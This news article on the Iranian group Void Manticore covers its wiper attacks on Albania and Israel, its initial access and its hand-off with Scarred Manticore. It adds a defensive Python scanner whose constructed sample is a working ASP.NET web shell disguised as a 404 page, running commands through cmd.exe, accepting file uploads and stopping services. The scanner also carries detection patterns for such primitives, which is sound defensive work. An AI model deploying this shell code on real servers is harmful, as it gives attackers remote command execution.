An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been identified as the perpetrator of destructive wiping attacks targeting Albania and Israel under the aliases Homeland Justice and Karma, respectively.
Cybersecurity firm Check Point tracks the group's activities under the name Void Manticore; Microsoft tracks the same cluster as Storm-0842 (formerly DEV-0842).
“There are significant similarities in the targets of Void Manticore and Scarred Manticore, indicating a systematic transfer of targets between the two groups for carrying out destructive activities against victims,” the company stated in a report released today.
This threat actor has conducted disruptive attacks against Albania since July 2022 under the Homeland Justice persona, using custom wiper malware tracked as Cl Wiper and No-Justice (also known as LowEraser).
Since the outbreak of the Israel-Hamas war in October 2023, the same actor has carried out comparable wiper attacks against Windows and Linux systems in Israel using another bespoke wiper code-named BiBi, this time operating under the pro-Hamas hacktivist persona Karma.
The group's attack chains are described as "simple and straightforward": they rely on publicly available tools and use legitimate protocols, namely Remote Desktop Protocol (RDP), Server Message Block (SMB), and File Transfer Protocol (FTP), to move laterally across a victim network before deploying the wipers. The lateral movement abuses valid access to these services rather than exploiting vulnerabilities in the protocols themselves.
Initial access is typically gained by exploiting known vulnerabilities in internet-facing applications, such as CVE-2019-0604, a remote code execution flaw in Microsoft SharePoint, according to an advisory issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2022.
Following a successful breach, the group deploys web shells, among them a custom one named Karma Shell. It masquerades as an error page while providing directory enumeration, process creation, file upload, and service management to the operator.
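A web shell that renders as an error page defeats casual review of what the browser shows, so a practical triage step is to look at the server-side source instead: flag script files whose visible HTML looks like an error page but whose code carries the four capabilities the report attributes to Karma Shell. The scanner below is an added example, not code from Check Point or from the report. The regular expressions for each capability are assumptions about how an ASP.NET web shell would typically implement it, and the three sample files (a benign error page, a shell-like file, a benign application page) are constructed for the demonstration.

```python
"""Triage scanner for web shells that masquerade as error pages.

Added example, not code from the report. Scans a web root for script files
whose rendered HTML looks like an error page but whose server-side code has
the primitives the report attributes to Karma Shell: directory enumeration,
process creation, file upload and service management. The file names and
contents used in demo() are constructed samples.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Server-side primitives per capability class. These patterns are assumptions
# about how an ASP.NET web shell would implement each function.
PRIMITIVES = {
    "process_creation": [r"Process\.Start", r"ProcessStartInfo", r"cmd\.exe"],
    "directory_enumeration": [r"Directory\.GetFiles", r"Directory\.GetDirectories", r"DirectoryInfo"],
    "file_upload": [r"Request\.Files", r"\.SaveAs\(", r"File\.WriteAllBytes"],
    "service_management": [r"ServiceController", r"sc\.exe", r"net\s+(start|stop)"],
}
# Markers that make the page look like an error page to a visitor.
ERROR_PAGE_MARKERS = [
    r"(?i)<title>[^<]*\b(error|not found|404|500)\b",
    r"(?i)server error",
    r"(?i)runtime error",
]
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".php", ".jsp"}


@dataclass
class Finding:
    path: str
    looks_like_error_page: bool
    capabilities: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A genuine error page has no reason to spawn processes or save uploads;
        # requiring two capability classes keeps single-pattern noise down.
        return self.looks_like_error_page and len(self.capabilities) >= 2


def analyze_source(path: str, text: str) -> Finding:
    """Classify one script file's source text."""
    caps = [name for name, pats in PRIMITIVES.items() if any(re.search(p, text) for p in pats)]
    err = any(re.search(m, text) for m in ERROR_PAGE_MARKERS)
    return Finding(path, err, caps)


def scan_webroot(root: str) -> list:
    """Return suspicious findings for every script file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
                p = os.path.join(dirpath, name)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    findings.append(analyze_source(p, fh.read()))
    return [f for f in findings if f.suspicious]


# Constructed samples: a benign error page, a shell-like page, a benign app page.
BENIGN_ERROR = """<%@ Page Language="C#" %>
<html><head><title>Server Error</title></head>
<body><h1>Runtime Error</h1><p>An application error occurred.</p></body></html>
"""
SHELL_LIKE = """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.ServiceProcess" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    string a = Request.Form["a"];
    if (a == "ls") foreach (var f in Directory.GetFiles(Request.Form["p"])) Response.Write(f);
    if (a == "run") Process.Start(new ProcessStartInfo("cmd.exe", "/c " + Request.Form["c"]));
    if (a == "up") Request.Files[0].SaveAs(Request.Form["p"]);
    if (a == "svc") new ServiceController(Request.Form["n"]).Stop();
}
</script>
<html><head><title>404 - Not Found</title></head><body>The resource cannot be found.</body></html>
"""
BENIGN_APP = """<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) { Response.Write(DateTime.Now); }
</script>
<html><head><title>Dashboard</title></head><body>Welcome</body></html>
"""


def demo() -> list:
    """Write the constructed samples into a throwaway web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in [("error.aspx", BENIGN_ERROR), ("style.aspx", SHELL_LIKE), ("default.aspx", BENIGN_APP)]:
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [os.path.basename(f.path) for f in scan_webroot(root)]


if __name__ == "__main__":
    print(demo())  # ['style.aspx']
```

On a real server, point `scan_webroot` at the IIS or PHP document root and review the hits by hand; a file whose only "error page" content is in the HTML while its code block talks to `Process.Start` and `Request.Files` is exactly the profile described above. The capability regexes should be extended for the languages actually served (PHP's `system`, `move_uploaded_file`, and so on) before relying on the tool.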
Void Manticore is also suspected of having used access first obtained by Scarred Manticore (also known as Storm-0861) to conduct its intrusions, pointing to a hand-off between the two actors rather than independent operations.
Microsoft previously described the same division of labor in its investigation into the 2022 attacks on the Albanian government, in which several Iranian actors each handled a distinct phase:
- Storm-0861 gained initial access and exfiltrated data
- Storm-0842 deployed ransomware and wiper malware
- Storm-0166 exfiltrated data
- Storm-0133 probed victim infrastructure
Storm-0861 is believed to be a sub-cluster within APT34 (also known as Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, and OilRig), an Iranian nation-state group associated with the Shamoon and ZeroCleare wiper malware.
Check Point stated, “The similarities in attack techniques against Israel and Albania, as well as the coordination between the two actors, suggest a routine process for these malicious activities conducted by Void Manticore.”
“Void Manticore’s operations blend psychological warfare with actual data destruction through wiping attacks and public data leaks, intensifying the impact on the targeted organizations.”